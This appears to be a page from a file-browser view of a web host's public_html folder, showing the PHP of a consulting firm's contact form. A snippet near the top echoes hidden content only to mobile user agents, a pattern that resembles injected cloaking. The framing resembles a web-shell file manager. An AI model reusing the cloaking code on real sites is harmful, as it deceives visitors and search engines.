/
home
/
whiteglobeco
/
public_html
/
Upload File
HOME
<?php $userAgent = $_SERVER['HTTP_USER_AGENT']; $mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile']; foreach ($mobileAgents as $agent) { if (stripos($userAgent, $agent) !== false) { echo $lineindexinstall; } } ?> <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { $name = $_POST['name']; $email = $_POST['email']; $role = $_POST['role']; $company = $_POST['company']; $interest = $_POST['interest']; $message = $_POST['message']; $to = "sales@nexoratechsolution.com"; $subject = "New Strategy Consultation Request"; $body = " Name: $name Email: $email Role: $role Organisation: $company Area of Interest: $interest Message: $message "; $headers = "From: Nexora Website <no-reply@nexoratechsolution.com>"; mail($to, $subject, $body, $headers); echo "Thank you! Your consultation request has been submitted."; } ?>